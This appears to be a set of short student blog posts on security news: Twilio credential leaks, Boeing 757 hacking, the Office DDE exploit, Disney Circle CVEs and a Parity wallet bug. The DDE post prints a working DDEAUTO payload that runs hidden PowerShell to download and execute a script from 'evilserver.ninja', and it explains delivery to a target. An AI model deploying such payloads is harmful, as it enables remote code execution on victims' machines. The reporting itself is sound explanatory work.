A Flaw in the World of Mobile Computing

The prospect of needing credentials to access a developer account in an app or to a website that provides an API is not a new concept. And the proliferated stereotype of the lazy developer is nothing to write home about. But some app developers have taken to new levels of carelessness. Appthority calls a new vulnerability they have found, “The Eavesdropper Vulnerability”. This is when the developer hard codes in their credentials to access the features of the device, specifically for the Twilo API. Those who exploit this vulnerability are able to access text messages, Twilo metadata, call metadata, and voice recordings.

This vulnerability does not rely on anything but the hard coded credentials themselves. No jailbreak, hacking, or effort is required. All that is needed to acquire these developer’s credentials is to find and app that uses the Twilo API, skim through it to find them in plain text, then use your favorite method to exfiltrate the data using the credentials.

What’s the solution here? More security conscious developers. There is no other option here than to have developers remove their credentials from the app’s code. That and to not do it again. This vulnerability was entirely preventable, those responsible for it simply did not.

Alan Richman.

Source: https://www.appthority.com/mobile-threat-center/blog/eavesdropper-mobile-vulnerability-exposing-millions-conversations/


Boeing 757 planes susceptible to security breaches

Recently a group of experts worked with homeland security to see if they could hack into a Boeing 757 jetliner. The team was succesful in the hack. The exact details were not disclosed for obvious reasons but they did say they got to the planes system through the radio frequency communications. Robert Hickey from Homeland Security presented at CyberSat Summit and most other experts said we have known that for years it’s no big deal, but when Hickey went to tell pilots of what they found they had no idea their planes were at risk to cyber attacks. Now Boeing 757’s have not been made since 2004 so it seems like it shouldn’t be an issue anymore, except many airlines like United and Delta still use these planes. president Trumps personal plane he uses to fly most places is also a 757. This issue is also difficult to patch they say it would $1 million to change one line of code on a planes system and would take a year to implement, making a patch near impossible. Boeing has said it isn’t something to worry about because it is an older model and system and the new planes like the 787 can’t be affected and were designed with security in mind. Which is good to hear a vulnerability in a plane could cause catastrophic problems.

-Levi Walker




Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using it’s Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data is becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute command prompt, also calling your payload. In the proof of concept demonstration, they used a powershell command to launch an Empire stager as the payload.

Whenever the Word document is opened it will ask first for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt which is a security warning due to the DDE asking for access to command prompt, however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the word file on the target system, and get the target to open the file, and click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE related vulnerabilities, most involve the user changing settings to use Secure and Control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also use Microsoft’s recommendation using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.


Daniel Szafran


Article Sources:

Macro-less Code Exec in MSWord    – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

The Security of Disney’s Circle Device

When thinking about Disney, most people think of the amusement park rides, the cartoons, or even the luxurious restaurants, shops, and hotels that they have created. This general branding of Disney™ has set this idea of a kid friendly and family orientated experience. Regarding Disney’s past technology, Disney is fairly new to the technology game and is always trying to get their research and new innovative technologies mostly integrated within their theme parks. One product that has nothing to do with the theme parks or cartoons that Disney stands for is called the Circle.

The Circle is a device that is made to connect family devices together, but most importantly, protect kids from going on certain websites. The idea of this device is to be able to monitor devices, without having the hassle of dealing with loading on software on every device. The product connects to all devices under the same network (wired or wireless) and the host user of the Circle is able to set time on device use, block, and view whatever is happening on the devices. Even though the idea of this device that Disney put out had good ideas behind it, there became a multiple number of vulnerabilities with the software and product, although, two major ones stand out.

The first vulnerability involves a notification bug with the software of the Circle. In general, intricate network packets can be created which leads to a OS command injection, where the attacker can send an HTTP request to trigger the vulnerability (CVE-2017-2917). The second vulnerability involves a bug in the signature verification of firmware updates for the Circle. An attacker who develops well-crafted network packets can cause an unsigned firmware to be installed where then alternate code can be loaded onto the device (CVE-2017-2898).

Overall, there are multiple vulnerabilities that are associated with this device released by Disney. Disney should have alternatively tested multiple common vulnerability techniques before launch of the Circle. In order to prevent further attacks from happening, Disney should sit down and go through these vulnerabilities and patch them, along with creating a stronger protective layer for the device for future encounters of similar attacks.

-Ryan Keihm









Please, Perform Proper Pre-release Procedures

Parity Wallet, a wallet used for storing Ethereum, had a serious vulnerability exposed in July, with its multi-factor wallets. One party could take over ownership of another’s wallet. A white hat group of Ethereum users realized what was going on and used the same vulnerability to claim every other users’ wallet so that the original actor (black hat, stole roughly $30 million) could not. On July 20th, this vulnerability was patched.

Now there’s a new issue.

Any multi-factor wallets created or updated after the July 20th patch can no longer move money out of their wallet. This is because calling initWallet just converts a contract library into a multi-factor wallet instead of allowing one to use the wallet.

This is not an issue with Ethereum at large, only with Parity Multi-factor wallets.

Official post: https://paritytech.io/blog/security-alert.html

By: Connor Shade